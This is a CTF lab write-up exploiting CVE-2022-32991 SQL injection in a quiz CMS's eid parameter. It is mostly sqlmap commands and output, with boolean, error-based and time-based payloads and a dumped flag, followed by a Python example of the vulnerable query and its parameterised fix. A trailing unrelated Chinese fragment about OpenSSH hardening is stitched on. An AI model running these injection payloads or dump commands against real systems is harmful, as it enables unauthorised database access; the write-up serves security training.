Chunqiu Yunjing (春秋云镜) - CVE-2022-32991

Time: 2023-09-21 09:46:10

Target description:
welcome.php in this CMS is vulnerable to SQL injection.

Open the page, register an account first, then log in with the email address and password.

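Capture the traffic with Burp Suite, with SQLiPy running in the background, then test welcome.php. The usual statements did not succeed, but after a while a result came back: the injection point is the eid parameter, and judging by the payload it is boolean-based blind injection.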

Go straight to sqlmap and dump the database.

sqlmap -r sql.txt --dbs --batch

The rest is simple:

root@Lockly temp/tmp » sqlmap -r sql.txt -D ctf --tables --batch
...
[09:17:02] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:17:02] [INFO] fetching tables for database: 'ctf'
[09:17:02] [WARNING] reflective value(s) found and filtering out
[09:17:02] [INFO] retrieved: 'user'
[09:17:02] [INFO] retrieved: 'options'
[09:17:02] [INFO] retrieved: 'quiz'
[09:17:03] [INFO] retrieved: 'admin'
[09:17:03] [INFO] retrieved: 'questions'
[09:17:03] [INFO] retrieved: 'history'
[09:17:03] [INFO] retrieved: 'rank'
[09:17:03] [INFO] retrieved: 'flag'
[09:17:03] [INFO] retrieved: 'answer'
Database: ctf
[9 tables]
+-----------+
| admin     |
| history   |
| options   |
| rank      |
| user      |
| answer    |
| flag      |
| questions |
| quiz      |
+-----------+


root@Lockly temp/tmp » sqlmap -r sql.txt -D ctf -T flag --columns --batch
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.7.9#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:18:02 /2023-09-21/

[09:18:02] [INFO] parsing HTTP request from 'sql.txt'
[09:18:03] [INFO] resuming back-end DBMS 'mysql' 
[09:18:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: q=quiz&step=2&eid=-8440' OR 5703=5703#&n=1&t=34

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: q=quiz&step=2&eid=60377db362694' OR (SELECT 3817 FROM(SELECT COUNT(*),CONCAT(0x7176627871,(SELECT (ELT(3817=3817,1))),0x71706a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- trpQ&n=1&t=34

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: q=quiz&step=2&eid=60377db362694' AND (SELECT 1411 FROM (SELECT(SLEEP(5)))hVOO)-- gdHD&n=1&t=34
---
[09:18:03] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:18:03] [INFO] fetching columns for table 'flag' in database 'ctf'
[09:18:03] [WARNING] reflective value(s) found and filtering out
[09:18:03] [INFO] retrieved: 'flag'
[09:18:04] [INFO] retrieved: 'varchar(1024)'
Database: ctf
Table: flag
[1 column]
+--------+---------------+
| Column | Type          |
+--------+---------------+
| flag   | varchar(1024) |
+--------+---------------+

[09:18:04] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zei2boyfnmt1xivgitc.cloudeci1.ichunqiu.com'

[*] ending @ 09:18:04 /2023-09-21/

root@Lockly temp/tmp » sqlmap -r sql.txt -D ctf -T flag -C flag --dump --batch
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.7.9#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:18:48 /2023-09-21/

[09:18:48] [INFO] parsing HTTP request from 'sql.txt'
[09:18:48] [INFO] resuming back-end DBMS 'mysql' 
[09:18:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: q=quiz&step=2&eid=-8440' OR 5703=5703#&n=1&t=34

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: q=quiz&step=2&eid=60377db362694' OR (SELECT 3817 FROM(SELECT COUNT(*),CONCAT(0x7176627871,(SELECT (ELT(3817=3817,1))),0x71706a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- trpQ&n=1&t=34

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: q=quiz&step=2&eid=60377db362694' AND (SELECT 1411 FROM (SELECT(SLEEP(5)))hVOO)-- gdHD&n=1&t=34
---
[09:18:48] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:18:48] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'ctf'
[09:18:49] [WARNING] reflective value(s) found and filtering out
[09:18:49] [INFO] retrieved: 'flag{dca0ffb4-d243-4ebc-b6da-68da58943fd5}'
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag                                       |
+--------------------------------------------+
| flag{dca0ffb4-d243-4ebc-b6da-68da58943fd5} |
+--------------------------------------------+

[09:18:49] [INFO] table 'ctf.flag' dumped to CSV file '/root/.local/share/sqlmap/output/eci-2zei2boyfnmt1xivgitc.cloudeci1.ichunqiu.com/dump/ctf/flag.csv'
[09:18:49] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zei2boyfnmt1xivgitc.cloudeci1.ichunqiu.com'

[*] ending @ 09:18:49 /2023-09-21/

root@Lockly temp/tmp » 
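
Why eid answers true/false questions, and the fix, as an added example that is not the CMS's code or part of the original post. SQLite stands in for MySQL; the questions table, its columns and the 13-hex-digit id format are assumptions, and the probe is the logged boolean payload with `#` swapped for `--` because SQLite has no `#` comment.

```python
import re
import sqlite3

# Logged boolean-blind payload shape; "#" replaced by "--" for SQLite.
TRUE_PROBE = "-8440' OR 5703=5703-- x"
FALSE_PROBE = "-8440' OR 5703=5704-- x"

# Assumed id format, inferred from the eid value 60377db362694 in the log.
EID_RE = re.compile(r"[0-9a-f]{13}")


def make_db():
    """Constructed sample data; table and column names are hypothetical."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE questions (eid TEXT, sn INTEGER, qns TEXT)")
    conn.executemany(
        "INSERT INTO questions VALUES (?, ?, ?)",
        [("60377db362694", 1, "Q1"), ("60377db362694", 2, "Q2"),
         ("5b141b8009cf0", 1, "other quiz")],
    )
    return conn


def questions_vulnerable(conn, eid):
    # Weak form: the request value is pasted into the SQL text, so a quote
    # in eid closes the string literal and the remainder is parsed as SQL.
    sql = "SELECT qns FROM questions WHERE eid='" + eid + "' ORDER BY sn"
    return [row[0] for row in conn.execute(sql)]


def questions_safe(conn, eid, validate=True):
    # Hardened form: the value is bound as a parameter and is only ever
    # compared as data. The format check is defence in depth on top.
    if validate and not EID_RE.fullmatch(eid):
        return []
    sql = "SELECT qns FROM questions WHERE eid=? ORDER BY sn"
    return [row[0] for row in conn.execute(sql, (eid,))]


if __name__ == "__main__":
    db = make_db()
    for name, value in (("true probe", TRUE_PROBE), ("false probe", FALSE_PROBE)):
        print(name, "vulnerable:", len(questions_vulnerable(db, value)),
              "rows; bound:", len(questions_safe(db, value, validate=False)), "rows")
```

The differing row counts between the two probes in the concatenated query are the signal a boolean-based blind test relies on; with the bound parameter both probes return nothing.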

From: https://www.cnblogs.com/bktown/p/17719140.html

    最烦做等保了!!!! 有没有同感的? 修复过程记录一下,为什么要记录呢,等保漏洞每次都是那些,我一直没有进行文档记录,导致我每次都要百度搜索解决。查看当前服务器openssh的版本#当前系统版本cat/etc/redhat-releaseCentOSLinuxrelease7.9.2009(Core)ssh-vOpenSSH_7.4p1......